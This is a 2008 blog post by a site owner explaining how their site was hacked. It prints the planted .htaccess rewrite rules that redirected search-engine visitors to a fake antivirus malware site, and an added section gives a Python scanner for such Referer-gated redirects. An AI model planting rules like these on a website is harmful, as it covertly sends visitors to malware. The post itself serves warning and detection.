My Website Got Hacked!

An examination of how our website was hacked.

Anybody who was referred to (or some other sites) through a search engine was redirected to a Russian malware site for a fake “AntiVirus” scanner. Searching around the net, it appears that other sites hosted at IX Web Hosting were also hacked.

It was quite a cunning plan. For the technically inclined, the “.htaccess” file was replaced with the text

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* [R,L]

which for those who don’t speak Apache (Web Server Dialect), means

Redirect everybody who came here from a search engine to a malware site.

The cunning part being that if I visited my own site from a bookmark, a hyperlink, or by typing in the URL, it should have appeared normal. In fact due to an error, the site crashed, which is how I noticed the problem. A visitor who found the site through a search engine also took the trouble to email me a warning that the site had been hacked – Thanks Paul.
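Because a redirect like this only fires for visitors arriving from a search engine, checking the site in a browser will not reveal it; the .htaccess file itself has to be inspected. The following is an added example, not code from the original incident: a small scanner that flags any RewriteRule sending visitors to an outside host when it is gated on the Referer header. The function name, the sample rules and the placeholder redirect target are assumptions, since the real target URL is not shown above.

```python
import re

# Constructed sample modelled on the rules quoted above. The redirect target
# is a placeholder; the original URL does not appear in this article.
SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://placeholder.invalid/ [R,L]
"""

REFERER_COND = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)', re.I)
REWRITE_RULE = re.compile(r'^\s*RewriteRule\s+\S+\s+(\S+)', re.I)
ABSOLUTE_URL = re.compile(r'https?://([^/:]+)', re.I)


def find_referer_redirects(text, own_hosts=()):
    """Return one finding per RewriteRule that sends the visitor to a host
    outside own_hosts and is preceded by a Referer-based RewriteCond."""
    findings, referer_patterns = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        cond = REFERER_COND.match(line)
        if cond:
            # Conditions accumulate until the next RewriteRule consumes them.
            referer_patterns.append(cond.group(1))
            continue
        rule = REWRITE_RULE.match(line)
        if not rule:
            continue  # comments, blank lines and other directives
        target = rule.group(1)
        host = ABSOLUTE_URL.match(target)
        # mod_rewrite issues an external redirect for an absolute URL on a
        # different host, whether or not the [R] flag is present.
        if referer_patterns and host and host.group(1).lower() not in own_hosts:
            findings.append({"line": lineno, "target": target,
                             "referers": list(referer_patterns)})
        referer_patterns = []  # conditions apply only to the rule they precede
    return findings


if __name__ == "__main__":
    for f in find_referer_redirects(SAMPLE):
        print(f"line {f['line']}: redirects to {f['target']} "
              f"when Referer matches {f['referers']}")
```

Pass the site's own hostnames in `own_hosts` so that legitimate canonical-host redirects are not reported.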

There unfortunately isn’t any way to tell the visitors who got redirected what happened.

I’ve been through my log files, checked the access logs, changed passwords, and concluded the security breach wasn’t due to a security hole in my website or carelessness on my part.

All I can really do now is warn other site owners of this exploit (via this posting), and

I would like to apologize to
people I do not know
and cannot know
for an unknown error
made by an unknown person.

That sounds almost like the poetry of Donald Rumsfeld.

14 November 2008
